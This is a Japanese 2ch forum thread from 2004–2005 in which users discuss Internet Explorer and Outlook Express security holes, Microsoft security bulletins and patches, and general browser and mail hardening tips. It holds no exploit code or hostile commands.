名無しさん@お腹いっぱい。 :04/05/20 16:38
716 :
名無しさん@お腹いっぱい。 :04/05/21 12:03
717 :
名無しさん@お腹いっぱい。 :04/06/02 21:40
718 :
名無しさん@お腹いっぱい。 :04/06/09 12:21
719 :
名無しさん@お腹いっぱい。 :04/06/10 09:42
721 :
名無しさん@お腹いっぱい。 :04/06/11 15:48
JustSystem Shurikenマンセー 独自ブラウザエンジンマンセー
723 :
名無しさん@お腹いっぱい。 :04/06/12 23:42
724 :
名無しさん@お腹いっぱい。 :04/06/15 12:58
725 :
名無しさん@お腹いっぱい。 :04/06/23 00:14
726 :
名無しさん@お腹いっぱい。 :04/06/24 10:51
728 :
名無しさん@お腹いっぱい。 :04/06/25 21:08
一番良いのはIEもOEも使わないことなんだが…。
>>1 の「建設的に」ってのは、「それを言うな」って意味なんだろうね?
んじゃ、勝手にすれば?
ワロタ
732 :
名無しさん@お腹いっぱい。 :04/06/30 14:31
733 :
名無しさん@お腹いっぱい。 :04/07/01 13:08
734 :
名無しさん@お腹いっぱい。 :04/07/01 15:18
>>733 ((;゚Д゚)ガクガクブルブル
おかげさまでIE(含OE)は何でもありのブラウザまで進化しました。 この状況を希望しない方はFirefox若しくはOperaをご使用下さい。
( ゚Д゚)<ポカーン
737 :
名無しさん@お腹いっぱい。 :04/07/02 12:45
これってIE3/4で一度は修正された穴でしょ。 どいつもこいつも三歩歩いたら忘れる学習能力ゼロの鳥頭ですか?
741 :
名無しさん@お腹いっぱい。 :04/07/06 19:21
744 :
名無しさん@お腹いっぱい。 :04/07/13 09:59
745 :
名無しさん@お腹いっぱい。 :04/07/13 10:19
もう良いよ。疲れたよ。 非IE系ブラウザに乗り換えます。
747 :
名無しさん@お腹いっぱい。 :04/07/14 09:09
748 :
名無しさん@お腹いっぱい。 :04/07/14 11:59
749 :
名無しさん@お腹いっぱい。 :04/07/14 22:56
》749 自動的にMozilla♪
》????????????
752 :
名無しさん@お腹いっぱい。 :04/07/29 09:40
セキュリティ・ホール 人間が作っているんだもんそんなの当たり前。 きっと完璧なコンピューターでロジックのあら捜ししたら、今見つかっている 5倍は見つかると思うよ。
754 :
名無しさん@お腹いっぱい。 :04/07/31 09:38
757 :
名無しさん@お腹いっぱい。 :04/08/17 17:39
758 :
名無しさん@お腹いっぱい。 :04/08/18 11:55
Operaだって1ヶ月に4回アドレスバー偽装が発見されたりしたじゃん
テスト結果 Internet Explorer v6.00 SP1 (6.00.2800.1106)では再現されました Mozilla/5.0 Gecko/20040803 Firefox/0.9.3では再現されず
761 :
名無しさん@お腹いっぱい。 :04/08/20 13:03
762 :
名無しさん@お腹いっぱい。 :04/08/24 15:08
763 :
名無しさん@お腹いっぱい。 :04/08/26 12:54
765 :
名無しさん@お腹いっぱい。 :04/09/02 23:44
766 :
名無しさん@お腹いっぱい。 :04/09/05 00:08
767 :
MS04-028 :04/09/15 09:10:36
===緊急===
MS04-028 - JPEG 処理 (GDI+) のバッファ オーバーランにより、コードが実行される (833987)
http://go.microsoft.com/?linkid=996596 概要 JPEG イメージ形式の処理に脆弱性が存在します。
影響 リモートでコードが実行される
影響を受けるソフトウェア・Windows、Office、Developer、Internet Explorer、他のソフトウェア
詳細な情報は、「影響を受けるソフトウェアおよびダウンロード先」をご確認ください。
XPのSP1だけど、Windows Updateサイトで確認してもMS04-028は出ません。 .NET Framework 1.1 Service Pack 1入れてあるからMS04-028は入れなくて もいいんだろうか? とりあえずしばらくは関連情報に注目しときます。
769 :
名無しさん@お腹いっぱい。 :04/09/15 11:55:38
770 :
名無しさん@お腹いっぱい。 :04/09/22 10:36:53
771 :
名無しさん@お腹いっぱい。 :04/09/25 22:57:30
772 :
名無しさん@お腹いっぱい。 :04/09/29 14:16:26
773 :
名無しさん@お腹いっぱい。 :04/09/30 09:37:07
初心者で申し訳ないのですが、質問させてください。 OEを使っているのですが、気付いたらアカウントの設定 (”サーバー”タブ内のSMTP欄)がいつのまにかlocal hostに変わっていました。 前はISPのSMTPサーバー名を入れてあったのに・・・。 これってどうしてでしょうか?
アンチウィルスソフトがメーラーを監視するためにlocalhostにして 中継している場合もあるよ。
777 :
名無しさん@お腹いっぱい。 :04/09/30 14:30:34
777get!!
778 :
名無しさん@お腹いっぱい。 :04/10/05 09:09:23
780 :
名無しさん@お腹いっぱい。 :04/10/13 08:54:26
781 :
名無しさん@お腹いっぱい。 :04/10/14 18:55:38
MS04-038は、なさそうだね。
783 :
名無しさん@お腹いっぱい。 :04/10/22 13:19:04
784 :
名無しさん@お腹いっぱい。 :04/10/27 23:59:12
785 :
名無しさん@お腹いっぱい。 :04/10/29 14:38:15
787 :
名無しさん@お腹いっぱい。 :04/11/02 13:30:08
788 :
名無しさん@お腹いっぱい。 :04/11/02 13:46:46
次から次へと穴が見つかるのは何故? 1.シェアが高くて注目されてるから 2.もともと設計が糞だから 3.… 他のOS用のIE6SP2もリリースすべきヽ(`Д´)ノ
>>787 このページの解説がいつも糞なのは、セキュリティソフトのシールドを有効にしていれば、
おそらく実行されるスクリプトコードに既に対応していて、ウィルスと判定してくれて実行などされないので、
全く実害が無いという事である。
790 :
名無しさん@お腹いっぱい。 :04/11/02 23:23:33
みんながセキュリティソフト入れてれば、ね。
792 :
名無しさん@お腹いっぱい。 :04/11/04 11:42:59
>>791 なんでも年齢と郵便番号を偽って登録してたそうな。
早く反省し終わって復帰キボンヌ
偽ってというか、 あんなサービスに正しい個人情報差し出す奴いるのか? しかしいきなり消すかねえ。 有名サイトなので目をつけられたのか、あからさまに偽と確定できる 住所(「〒123-45 東京都東京市東京町1-1-1」みたいな実在しない やつ)で登録してたからか。
> 住所をご登録頂いていないユーザー様には、登録情報変更ページに > て住所をご登録いただくまで、はてなをご利用頂けなくなります ああ、登録してなかったんだな。たぶん。 そうまでして個人情報吸い上げようとするか。 何か新しい商売はじめるのかね。
>>795 それは来年1月からだろう。
いま見られなくなってるのはTakagiタンが自粛してプライベートモードにしてるだけだと思われ。
あのやり方だと氏名・住所の正確性は担保されないから、
>他者の権利侵害などが行われている場合などに、仮名でユーザー登録を頂いている等の理由で書き込みを行った方の特定ができない
という理由は薄弱だよなぁ。
797 :
名無しさん@お腹いっぱい。 :04/11/05 10:39:33
IEに新たなセキュリティ・ホール,WebページやHTMLメールを開くだけで被害を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041104/152149/ >デンマークSecuniaなどは11月2日,Internet Explorer(IE)6/6 SP1に
>見つかったセキュリティ・ホールを公表した。細工が施されたHTMLファイル
>(WebページやHTMLメール)を開くだけで,任意のプログラムを実行させ
>られる危険性がある。実際,セキュリティ・ホールを突くHTMLファイルが
>公開されている。IE 6に限らず,IEのコンポーネントを利用するメール・
>ソフトなども影響を受けるので要注意。なお,Windows XP SP2を適用して
>いる場合には影響を受けない。(ry
798 :
名無しさん@お腹いっぱい。 :04/11/05 11:06:17
ホント他のOS用にもIE6SP2出してほしいよ 仕方がないから会社のWin2kでのWebブラウズは 当面Firefox使うことにした
799 :
名無しさん@お腹いっぱい。 :04/11/05 13:39:52
IE6SP2(2K,ME,98用)激しくキボンヌ
NT用モナー
801 :
名無しさん@お腹いっぱい。 :04/11/05 16:02:02
>801 日経はトラッキングクッキー拒否にしているから見られないや まあいいか
>>802 /members/のページは、メンバー登録(無料)とcookieの両方必要。
805 :
名無しさん@お腹いっぱい。 :04/11/10 09:11:23
807 :
名無しさん@お腹いっぱい。 :04/11/10 16:14:45
809 :
名無しさん@お腹いっぱい。 :04/11/17 17:28:20
812 :
名無しさん@お腹いっぱい。 :04/11/27 19:47:56
813 :
名無しさん@お腹いっぱい。 :04/11/28 20:49:17
814 :
MS04-040緊急 :04/12/02 07:04:56
816 :
名無しさん@お腹いっぱい。 :04/12/02 13:36:40
ていうか889669じゃないとセキュリティ修正以外のパッチでもトラブル覚悟ですぐ当てるタイプの人には不足(889293でも穴はふさがるけど) >更新プログラム 889669 には、セキュリティ更新プログラム 889293 (MS04-040) の提供後に作成された Internet Explorer 用修正プログラムのすべてが含まれています。
819 :
816 :04/12/02 19:07:20
821 :
名無しさん@お腹いっぱい。 :04/12/07 21:57:48
もう訳わからん。
常にこのページのパッチさえ当てとけばおっけ
みたいな分かりやすい形にしてくれ。
ごちゃごちゃ読んでられん。
で、質問なんだけど、
OEってHTML形式で送られてきてもテキスト形式で表示させてる限り無問題?
俺はメールの送信者をアルファベットで表記してるんだけど、
送信者に表示されるのが日本語の名前じゃないと
怖くて開かずに削除してしまう癖があるとおっしゃる方がおられます。
海外からウィルスよく来るので。
常にテキスト形式で表示させておけばいいんじゃないかと思うのだけど。
from
SUZUKI kenji <
[email protected] >
を
鈴木賢治 <
[email protected] >
にして欲しいらしい。
ヘッダに日本語混ぜたくない。
subjectは妥協してるけど。
いや昔のサーバーとかMUAの問題からじゃなくて単に好みでそうしてるんだけど。
無問題なんて言い切れるのは神様かただの莫迦だよ だってMSだもの みつを
824 :
名無しさん@お腹いっぱい。 :04/12/08 10:55:00
>>822 無問題といいきれないが、少なくともテキスト表示にして
標準のブラウザをIE(コンポーネント使用ブラウザ含む)以外のブラウザ(FireFoxとかOperaとか)にしておけば、
かなりリスクは低減できると思う(さらにJavaScriptも無効に)。
そこまでしてOE使うなという意見もあるけど、いろんな事情で使わざるを得ない人もいるだろうから…
OE 使うのはやめとけ SP2パッチあててFirefox (Javaスクリプト無効) 導入汁 ファイアーウオールはKerio personal ファイアーウオールでMAXセキュに設定 ルーターは2重で完璧!!(要:ポート設定) アンチウイルスソフトはノートンかKasperskyA-V導入 これだけで9割不正アクセス&ウイルスに対して有効
826 :
名無しさん@お腹いっぱい。 :04/12/08 14:43:54
やっぱコンポーネントの問題は逃れられないのか。 んで、さっきIE6を アンインストール→インストールし直し したんだけど、 Windows Updateで、なぜか823559だけ何度も表示される。 適用したはずなのに、再起動してもう一度行くとまた表示される。 パッチをダウンロードして保存してから実行してもダメ。 まぁこんなこともよくあるのでしょう・・・が、 ちょっと不安なので、バージョン合ってるか見て下さい。 Ver.6.0.2800.1106 更新バージョン ; SP1 ; Q889293 ; Q837009 ; q313829 (最後のだけなぜかQが小文字) 関係ないけどこのバージョン情報って何とかコピペ出来ないんだろうか。 そもそもなぜ出来ないようにしてあるのだろうか。
書き忘れ OSは98seです。
>>825 ソフトよりユーザーの知識や意識の方が大事
>>826 このスレは初めてですが、同じ環境なので取り敢えず参考程度になれば・・・
スタート>プログラム>アクセサリ>システムツール>システム情報
のInternet Explorerを見ると、以下のようになっています。(コピーも出来ます)
バージョン 6.0.2800.1106IS
ビルド 62800.1106
プロダクト ID *****-***-*******-*****
アプリケーションのパス C:\Program Files\Internet Explorer
最終インストールの日付 16/07/24 15:56:35
言語 日本語
アクティブなプリンタ Kyocera Mita KM-2070 KX,KM163097,***.***.*.*:lp
暗号強度 128 ビット
コンテンツ アドバイザ 無効
更新バージョン ;SP1;q313829;Q822925;Q828750;Q824145;Q832894;Q837009;Q831167;Q823353;Q867801;Q833989;Q834707;Q889293;
Java VM バージョン 5.0.3810.0
IEAK インストール する
IEの更新バージョンに 823559 は見あたりませんが、「Windows Q823559 のアップデート」
というのが、「アプリケーションの追加と削除」にリストアップされています。
これは、システム情報の W98.SE の所でも見られます。
ちなみに、IE5→5.5→6とバージョンアップしてきて、IEをアンインストールしたことはありません。
>>829 有り難う御座います!参考になりました。
そうか、システム情報か・・・
> バージョン 6.0.2800.1106IS
このISってのが謎です。
↓うちのはこんな感じです。
バージョン6.0.2800.1106
ビルド62800.1106
アプリケーションのパスC:\Program Files\Internet Explorer
最終インストールの日付04/12/08 13:32:51
言語日本語
暗号強度128 ビット
コンテンツ アドバイザ無効
更新バージョン;SP1;Q889293;Q837009;q313829;
Java VM バージョン5.0.3810.0
IEAK インストールしない
831 :
名無しさん@お腹いっぱい。 :04/12/09 10:41:14
>>831 そこの
>Secuniaでは「信頼できるサイトを閲覧しているときには,信頼できないサイトを閲覧しない
>(Do not browse untrusted sites while browsing trusted sites)」ことを対策として挙げている。
の意味がいまいち分からんけど、やっぱ漏れが頭が悪いからかな?
>>832 作成者が分かってるサイトと一緒に、誰が作ってるのか分からないような変なサイト見るなって事。
835 :
KB887797 :04/12/15 12:24:01
Outlook Express 6 Sevice Pack 1 の累積的な更新プログラム(KB887797) なるものがWindowsUpdateに来ている。詳細不明。
× Sevice Pack 1 ○ Service Pack 1 逝ってきます…
>>836 ああ、835だった。834氏スマソ本当に逝ってきます。
838 :
名無しさん@お腹いっぱい。 :04/12/15 15:31:44
Outlook Express 6 Service Pack 1 用の累積的な更新プログラム (KB887797) このセキュリティに関連しない更新プログラムによって、Outlook Express のさまざまな問題が解決されます。 デスクトップに ~ というファイルが作成されるのが無くなったかも。
KB887797ぐぐっても昨日は0件だったが、今日は684件になってる(・∀・) でも、めぼしい情報はなさげ(;´Д`)
843 :
名無しさん@お腹いっぱい。 :04/12/17 08:47:05
844 :
名無しさん@お腹いっぱい。 :04/12/17 11:31:26
>>844 別のなんだー
ところで日本語KBで機械翻訳のやつはいつも決まり文句も変だよね
翻訳エンジンにお約束用語は入ってないのかと(ry
結局わかんないところは英語情報見るっちゅーねん
846 :
名無しさん@お腹いっぱい。 :04/12/19 22:54:20
>844 分割送信時のみの危険ということだな。分割送信のチェックだけまずは チェックオフを確認して、IEのSP待つとしよう。
849 :
名無しさん@お腹いっぱい。 :04/12/21 01:00:19
>848 ああ読み違えた。ありがと。当てました。
不具合をこっそりと直して知らん振りを決め込むのは、企業として何処でもやっている当たり前の行為だ。 大企業としてまず率先して情報公開に貢献してもらいたいものだ。
Microsoftはかなり貢献してると思うけど。マジで
853 :
名無しさん@お腹いっぱい。 :04/12/24 16:52:40
854 :
名無しさん@お腹いっぱい。 :04/12/24 23:36:10
安全という嘘をつくにはさらに嘘をつかねばならない。 独占企業と訴えられないようにAppleを生かしておかねばならない。
855 :
名無しさん@お腹いっぱい。 :04/12/27 12:41:21
856 :
名無しさん@お腹いっぱい。 :04/12/28 12:01:30
俺自身の脆弱性が問題だ
>>856 何でもクリックしてしまう悲しい性とか?
858 :
名無しさん@お腹いっぱい。 :04/12/28 12:32:19
正解。
┐(´ー`)┌
860 :
名無しさん@お腹いっぱい。 :05/01/05 17:08:28
>>860 IE6SP1以前はもうだめかなぁ
XP-SP2に汁(なかったらXPまともに動くPC買え)ってことか・・・
862 :
名無しさん@お腹いっぱい。 :05/01/12 12:21:53
863 :
名無しさん@お腹いっぱい。 :05/01/12 14:49:59
まさかセキュリティ情報一覧をセキュリティ情報検索(自動ですべて)と合体しちゃうとは思わなかったー 一覧画面から情報の最終更新日わかんないyo 初めて出た日付なんてどうでもいいんじゃ いっつも後から大事な情報出してくるじゃん ヴォケ− そんなに釣った魚にリソース割り当てたくないのかよ(´・ω・`)ショボーン
865 :
名無しさん@お腹いっぱい。 :05/01/18 08:54:02
>>865 そのExploit-Codeが出回る頃には、セキュリティソフトベンダーが
ウィルスとして対応するので、常駐シールドしていればそのような事にはなりませんから
見た人は勘違いしない事。
>>865-866 ベンダーが対応するまでは、怪しいサイトによく行く人は用心汁。
複数の種類のブラウザを用途によって使い分けるのも吉。
868 :
名無しさん@お腹いっぱい。 :05/01/18 21:43:41
MSセキュリティ ホーム から tp://www.microsoft.com/japan/technet/security/bulletin/ms05-003.asp MSセキュリティ情報検索(元一覧ページ) から tp://www.microsoft.com/japan/technet/security/Bulletin/MS05-003.asp (05-003はただの例) 同じところなのに大文字と小文字違いで一度飛んだリンクも紫にさせない意味わけわかめ 意味なんてないのかも???
870 :
名無しさん@お腹いっぱい。 :05/01/21 04:00:45
メーラーはOutlook以外を使う ブラウザはIE以外を使う これだけでセキュリティレベルが上がる
873 :
名無しさん@お腹いっぱい。 :05/01/28 21:47:57
876 :
名無しさん@お腹いっぱい。 :05/02/09 10:39:26
>>876 >重要: 以前に適用した修正プログラムまたは、更新プログラムのロールアップを使用している環境には、本セキュリティ更新プログラムを適用してはいけません。
>「よく寄せられる質問」をご覧いただき、適切な更新プログラムのロールアップを適用してください。
「いけません」ってめちゃx2誤解させる書き方だよな
これって結局
「電話で修正プログラム手に入れてもない&IEロールアップあてたことない香具師にはどーでもいー話だけど
関係ある環境は11月以降のIEロールアップあたってるならこのパッチだけで面倒見てやるけど
あたってない環境だとインストーラ的にアウトなんで11月(か12月)IEロールアップあててからこのパッチもあてれ」
だよね?
だったらパッチ・インストーラ作り直そうyoって思ったの漏れだけ?
ふー 大漁パッチあてやっとオワタ
フレーフレー(としかいいようがないけど)>いろんな動作(ryしなきゃ/もう始めてるよの中の人
881 :
名無しさん@お腹いっぱい。 :05/02/16 12:18:17
881のリンクじゃないや
884 :
名無しさん@お腹いっぱい。 :05/02/17 16:11:30
885 :
名無しさん@お腹いっぱい。 :05/02/22 15:20:39
886 :
名無しさん@お腹いっぱい。 :05/02/23 08:52:39
Windows Update キタ─wwヘ√レvv~(゚∀゚)─wwヘ√レvv~─!!!!!!
Double-byte character set (DBCS) characters may appear corrupted in
Internet Explorer on Windows XP when you browse a Web site that uses
Shift-JIS character encoding(KB886677)
http://support.microsoft.com/kb/886677 You receive the Stop error "Stop 0x05 (INVALID_PROCESS_ATTACH_ATTEMPT)"
in Windows XP Service Pack 2 or Windows Server 2003(KB887742)
http://support.microsoft.com/kb/887742
887 :
名無しさん@お腹いっぱい。 :05/02/23 16:54:18
たまたまとられた
890 :
名無しさん@お腹いっぱい。 :05/02/24 15:25:32
>>890 scriptだけでどうやって感染するのか書いてないな。
内容がはしょられすぎ
>>892 そんな手口いきなり詳しく書いちゃかえってまずいじゃん
>>894 どうよんでも、どこがウイルスなのかわからん。
増殖は不可能だろ?
896 :
名無しさん@お腹いっぱい。 :05/02/28 11:00:38
899 :
名無しさん@お腹いっぱい。 :05/03/07 10:41:06
902 :
名無しさん@お腹いっぱい。 :2005/03/24(木) 15:57:14
>>902-903 タイトルに[IE]〜付けるのやめたのか
あれ(これは見なくていいや)一目でわかりやすかったのにね
905 :
名無しさん@お腹いっぱい。 :皇紀2665/04/01(金) 14:18:55
907 :
名無しさん@お腹いっぱい。 :2005/04/05(火) 09:28:42
>>907 なんだかすっきりしないな。
さんざんチン●をしごかれた後に放り出されたような…
910 :
名無しさん@お腹いっぱい。 :2005/04/13(水) 13:28:42
911 :
名無しさん@お腹いっぱい。 :2005/04/13(水) 13:31:31
912 :
名無しさん@お腹いっぱい。 :2005/04/15(金) 10:51:07
深刻度格付けは確か「情報初公開時の」だったはずだから その時点では攻撃コードがないってことで「重要」になってても パッチを逆アセンブルされるのかすぐ実質「緊急」クラスに昇格することが多いな 知られてないセキュリティホールのパッチは確かに考えもんだわ そんな言い訳でもう攻撃コードあるのまで放置されそうだけどw
914 :
名無しさん@お腹いっぱい。 :2005/04/21(木) 22:37:51
>>914 そりゃそうだろうよ
おりゃ、無印のXPが発売された時に、
こりゃSP1になるまでは使い物にならないと判断して、
SP1が発売されるまで買わなかったもんね。
916 :
名無しさん@お腹いっぱい。 :2005/05/09(月) 22:41:29
917 :
名無しさん@お腹いっぱい。 :2005/05/11(水) 08:35:44
>>917 ○影響を受けるソフトウェア :
Microsoft Windows 2000 Service Pack 3 および Microsoft Windows 2000 Service Pack 4
※Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE)、Microsoft Windows Millennium Edition (ME)
※「緊急」以外のセキュリティ問題のための更新プログラムは提供されません。
○影響を受けないソフトウェア :
Microsoft Windows XP Service Pack 1 および Microsoft Windows XP Service Pack 2
Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 および Windows Server 2003 Service Pack 1
Microsoft Windows Server 2003 for Itanium-based Systems および Service Pack 1 を適用した Microsoft Windows Server 2003 for Itanium-based Systems
Microsoft Windows Server 2003 x64 Edition
上記のソフトウェアのテストを行い、この脆弱性による影響を評価しました。それより前のバージョンに関してはサポートの対象となっていないため、この脆弱性による影響は不明です。
http://www.microsoft.com/japan/technet/security/bulletin/ms05-024.mspx
>>919 >「従来のWindowsフォルダを使う」に設定変更して回避する
Win98,98SE,MEはパッチもないし今後は↑しかないわけだ
なんか穴が見つかって回避策するたびにちょっとずつ不便になって
最終的に知里も積もれば状態になってるような気がするのは漏れだけ?
従来のWindowsフォルダなんか不便で使えんぞ。 どうにかしてくれよな。
924 :
名無しさん@お腹いっぱい。 :2005/05/15(日) 00:53:15
925 :
名無しさん@お腹いっぱい。 :2005/06/02(木) 11:25:16
926 :
名無しさん@お腹いっぱい。 :2005/06/02(木) 12:40:19
928 :
名無しさん@お腹いっぱい。 :2005/06/02(木) 13:22:29
929 :
名無しさん@お腹いっぱい。 :2005/06/06(月) 10:05:28
930 :
名無しさん@お腹いっぱい。 :2005/06/06(月) 15:04:10
ちょっと広いやうな奇ガス できれば純正メーラーで欲しいけんど… 人居ないしどうしたもんか
934 :
名無しさん@お腹いっぱい。 :2005/06/10(金) 22:50:10
936 :
名無しさん@お腹いっぱい。 :2005/06/13(月) 12:03:01
938 :
キタ━━━━━━(゚∀゚)━━━━━━ !!!!! :2005/06/15(水) 08:41:12
941 :
名無しさん@お腹いっぱい。 :2005/06/15(水) 10:57:03
942 :
名無しさん@お腹いっぱい。 :2005/06/19(日) 15:26:22
【PC診断士】
http://pc.ai2you.com/PCshindanshi/index.asp ※無料のIDを作成する必要があります。
@ブラウザの安全度を無料診断できます。
ノートン入れてるのにセキュリティは中の下でした。
ぶっちゃけ参考になりません。誰がやっても同じ結果(低い結果)になるんじゃないの??
みんなも試してみよう!
APCのクリーン度をチェックする。
こちらの方が人気ありますね。
ウホッ!結果よろしく。
>>942 IEでActiveXを許可する時点で何でもできる環境与えているのに
安全度調査も何もないだろ。
前提条件が駄目すぎる。
クリーン度調査も、ネットでやるなよ。
レジストリからドライブの中身の調査だろ
怖くて、俺にはできん。
>>943 おっしゃるとおりで・・・w
えらく登録情報詳しく聞いてくんのね
ですね。 もっぱら僕は架空の氏名・住所の捨てIDですが。
947 :
名無しさん@お腹いっぱい。 :2005/06/20(月) 22:20:46
948 :
名無しさん@お腹いっぱい。 :2005/06/21(火) 10:07:24
949 :
名無しさん@お腹いっぱい。 :2005/06/21(火) 23:24:28
>>949 >Operaは最新版の8.01では修正されている。他のブラウザは,6月21日時点でパッチは提供されていない。
ふ〜ン。
952 :
名無しさん@お腹いっぱい。 :2005/06/27(月) 10:25:18
953 :
名無しさん@お腹いっぱい。 :2005/06/27(月) 15:30:06
トップダウン方式をやめないかぎり技術の進歩とセキュリティは相反するものの ように見えるかもしれない。アクセスしようとするところに鍵を懸けず、 そこへ行く道を塞いでいる。私達の行く手を制限している。 新しい技術は、そこへ行く新しい道を作り出す。
955 :
名無しさん@お腹いっぱい。 :2005/06/28(火) 11:45:26
956 :
名無しさん@お腹いっぱい。 :2005/06/29(水) 09:56:55
最近outbound方向でsvchostが変なリクエストしだすと思ったら どうも自動更新がMS以外にもつなごうとするらしい (無効にするとMBSA1.2から「リスク大」判定しやがるんでめんどーだから通知だけさせとく設定にしてたのよ) WMP10もフルモードのまま起動するといろんな(音楽配信系?)とこにつなごうとするし これ新しい流行なのかな?
958 :
名無しさん@お腹いっぱい。 :2005/07/01(金) 20:41:46
959 :
名無しさん@お腹いっぱい。 :2005/07/04(月) 17:52:11
960 :
名無しさん@お腹いっぱい。 :2005/07/08(金) 19:34:40
963 :
名無しさん@お腹いっぱい。 :2005/07/12(火) 16:12:55
964 :
963 :2005/07/12(火) 16:14:22
誤:Eの 正:IEの スマソ逝ってくる…
965 :
名無しさん@お腹いっぱい。 :2005/07/13(水) 08:31:56
967 :
966 :2005/07/13(水) 17:36:45
>966だから漏れjavaprxy.dllする回避策してるからMS05-037はしばらくスルーでいいや (近いうちにMSJVMアンインストールするつもりだしw) マイクロソフト カラー管理モジュールの脆弱性によりリモートでコードが実行される (901214) (MS05-036) だけ当ててこうとインストーラ実行したら ----------------------------------------------- 注 : Microsoft Corporation またはお客様の所在 地に応じては、その子会社 (以下総称して「マイクロ ソフト」といいます) がお客様に本追加ソフトウェア を許諾するものとします。お客様は、本追加ソフトウ ェアと共に使用することを指定された Microsoft Windows ソフトウェア (以下「本ソフトウェア」と いいます) の正規に許諾された各コピーと共に、この 追加ソフトウェアを使用することができます。お客様 が本ソフトウェアの許諾を受けていない場合、本追加 ソフトウェアを使用することはできません。お客様に よる本追加ソフトウェアの使用は、本ソフトウェアに 付属する使用許諾契約書に拘束されるものとします。 EULAID:HFX_RM.0_GDR_NRL_JA ------------------------------------------ エッ!!!!!これだけ?うそーん_| ̄|○ マッマサカ (順不同) パッチ公開時点で穴がもう悪用されてる報告がMSに来てたつーから仕方なく当てましたよ ええ けど何同意してるかわかったもんじゃない つーかこんなの有効なの?
969 :
名無しさん@お腹いっぱい。 :2005/07/13(水) 20:51:40
>MicrosoftWindows ソフトウェア (以下「本ソフトウェア」といいます) (ry >お客様による本追加ソフトウェアの使用は、本ソフトウェアに >付属する使用許諾契約書に拘束されるものとします。 本追加ソフトウェア=このパッチ? 本ソフトウェア=元のWindows? 結局元々のEULAそのまま(今までと同じ)ということでいい? ナンカヤヤコシイ
970 :
名無しさん@お腹いっぱい。 :2005/07/13(水) 23:46:54
972 :
Windows 2000 SP4 UR1関連 :2005/07/19(火) 09:47:40
973 :
名無しさん@お腹いっぱい。 :2005/07/19(火) 14:14:54
974 :
名無しさん@お腹いっぱい。 :2005/07/20(水) 16:42:14
975 :
名無しさん@お腹いっぱい。 :2005/07/25(月) 11:47:53
977 :
名無しさん@お腹いっぱい。 :2005/08/05(金) 11:00:46
978 :
名無しさん@お腹いっぱい。 :
2005/08/09(火) 09:40:05